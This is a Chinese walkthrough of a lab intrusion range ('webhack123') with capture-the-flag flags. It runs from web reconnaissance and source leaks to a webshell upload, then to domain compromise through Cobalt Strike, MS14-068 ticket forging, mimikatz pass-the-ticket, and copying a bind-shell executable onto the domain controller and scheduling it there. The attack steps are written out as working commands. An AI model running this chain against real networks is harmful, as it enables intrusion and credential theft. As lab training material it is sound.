完整内网域靶场-webhack123

靶场描述

靶场拓扑图

PS：该靶场作者：暗月

HOSTS设置

cat /etc/hosts  
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

192.168.0.203 www.webhack123.com

WEB服务器

信息收集

端口扫描

sudo nmap -sT -sV -O -p- 192.168.0.203
Starting Nmap 7.93 ( https://nmap.org ) 
Stats: 0:01:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for www.webhack123.com (192.168.0.203)
Host is up (0.0032s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql              MySQL (unauthorized)
3389/tcp  open  ssl/ms-wbt-server?
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 00:0C:29:44:38:FD (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.37 seconds

目录遍历

dirsearch -u "www.webhack123.com"                    

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/www.webhack123.com.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.webhack123.com/

[02:43:50] Starting: 
[02:43:51] 403 -    2KB - /%C0%AE%C0%AE%C0%AF                            
[02:43:51] 403 -    2KB - /%3f/                                          
[02:43:51] 403 -    2KB - /%ff                                           
[02:43:52] 200 -    6KB - /.DS_Store                                     
[02:43:52] 200 -    6KB - /.ds_store
[02:43:53] 403 -    2KB - /.ht_wsr.txt                                   
[02:43:53] 403 -    2KB - /.htaccess.bak1                                
[02:43:53] 403 -    2KB - /.htm
[02:43:53] 403 -    2KB - /.html
[02:43:53] 403 -    2KB - /.htaccessOLD2
[02:43:53] 403 -    2KB - /.htaccessBAK
[02:43:53] 403 -    2KB - /.htaccess.orig
[02:43:53] 403 -    2KB - /.htaccess_extra
[02:43:53] 403 -    2KB - /.htaccess.sample
[02:43:53] 403 -    2KB - /.htaccess_orig
[02:43:54] 403 -    2KB - /.htaccess_sc
[02:43:54] 301 -  240B  - /.idea  ->  http://www.webhack123.com/.idea/
[02:43:54] 403 -    2KB - /.htaccessOLD
[02:43:54] 403 -    2KB - /.htpasswd_test
[02:43:54] 403 -    2KB - /.htaccess.save
[02:43:54] 403 -    2KB - /.htpasswds
[02:43:54] 403 -    2KB - /.httr-oauth
[02:43:54] 403 -    2KB - /.idea/                                        
[02:43:54] 301 -  253B  - /.idea/dictionaries  ->  http://www.webhack123.com/.idea/dictionaries/
[02:43:54] 200 -  264B  - /.idea/modules.xml                             
[02:43:54] 200 -  333B  - /.idea/misc.xml                                
[02:43:54] 200 -  180B  - /.idea/vcs.xml                                 
[02:43:54] 200 -   38KB - /.idea/workspace.xml                           
[02:43:56] 301 -  239B  - /.svn  ->  http://www.webhack123.com/.svn/      
[02:43:56] 200 -    3B  - /.svn/entries                                   
[02:43:56] 403 -    2KB - /.svn/                                          
[02:43:57] 200 -  428KB - /.svn/wc.db                                     
[02:43:59] 200 -  479B  - /404.html                                       
[02:44:02] 403 -    2KB - /Public/                                        
[02:44:03] 403 -    2KB - /Trace.axd::$DATA                               
[02:44:16] 403 -    2KB - /app/.htaccess                                  
[02:44:16] 301 -  238B  - /app  ->  http://www.webhack123.com/app/        
[02:44:16] 403 -    2KB - /app/                                           
[02:44:18] 301 -  239B  - /base  ->  http://www.webhack123.com/base/      
[02:44:18] 403 -    2KB - /base/
[02:44:20] 403 -    2KB - /cgi-bin/                                       
[02:44:21] 500 -    3KB - /cgi-bin/printenv.pl                            
[02:44:27] 301 -  240B  - /error  ->  http://www.webhack123.com/error/    
[02:44:27] 200 -    2KB - /error/                                         
[02:44:33] 200 -   11KB - /index.php                                      
[02:44:33] 403 -    2KB - /index.php::$DATA                               
[02:44:33] 200 -   11KB - /index.pHp                                      
[02:44:34] 200 -   11KB - /index.php.                                     
[02:44:34] 200 -   15KB - /index.php/login/                               
[02:44:47] 301 -  241B  - /public  ->  http://www.webhack123.com/public/  
[02:44:47] 301 -  243B  - /public..  ->  http://www.webhack123.com/public../
[02:44:47] 403 -    2KB - /public/
[02:44:54] 403 -    2KB - /server-info                                    
[02:44:54] 403 -    2KB - /server-status/                                 
[02:44:54] 403 -    2KB - /server-status
[02:45:00] 403 -    2KB - /web.config::$DATA                              
                                                                           
Task Completed

DS_Store泄露

python3 ds_store_exp.py http://www.webhack123.com/.DS_Store 

Svn泄露

python3 SvnExploit.py -u http://www.webhack123.com/.svn/ 

漏洞测试

日志文件敏感信息泄露

打开日志文件发现其中有SQL修改记录。

编写个小脚本把日志文件全部写入文件中：脚本代码下载地址。

拿到的日志文件后，过滤出更新密码的SQL记录：

cat logs.txt | grep "UPDATE"  | grep "pass"

因为拿到的日志是从前往后的，所以下面才是最新的修改记录。

74c774ef39b5b977c1fd59dbfc73c3e380a65aa3

Host碰撞

因为目录遍历没有找到后台地址，尝试Host碰撞子域名。

编写个简易的Host碰撞脚本：脚本代码下载地址。

go run main.go

后台文件上传GetShell

通过前面拿到的密码登录后台，上传文件类型添加php。

在下方网站logo出上传webshell。返回信息中有相对路径，再根据目录扫描结果，在public/upload下面。

Flag1

Flag2

域控

信息收集

上线cs，注入域用户的进程。

找到域控地址：

shell net time /domain
shell ping dc.hackbox.com

密码凭据导出

MS14-068

shell whoami /user
shell ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456
mimikatz kerberos::ptc TGT_web@hackbox.com.ccache

shell dir \\dc.hackbox.com\c$
shell copy bind4444.exe \\dc.hackbox.com\C$
shell net time \\dc.hackbox.com
shell at \\dc.hackbox.com 15:39 "c:/bind4444.exe"

获取域用户suid

shell whoami /user

利用exp到处票据

shell ms14-068.exe -u test@sty.com -s S-1-5-21-4087924319-805361504-2015691904-1104 -d 10.1.1.10 -p Admin12345

通过mimikatz导入票据

mimikatz kerberos::ptc TGT_web@hackbox.com.ccache

验证IPC是否成功连接

shell dir \\dc.hackbox.com\c$

通过at上线

shell net time \\dc.hackbox.com
shell at \\dc.hackbox.com 15:39 "c:/bind4444.exe"

connect 10.10.10.149 4444

Flag3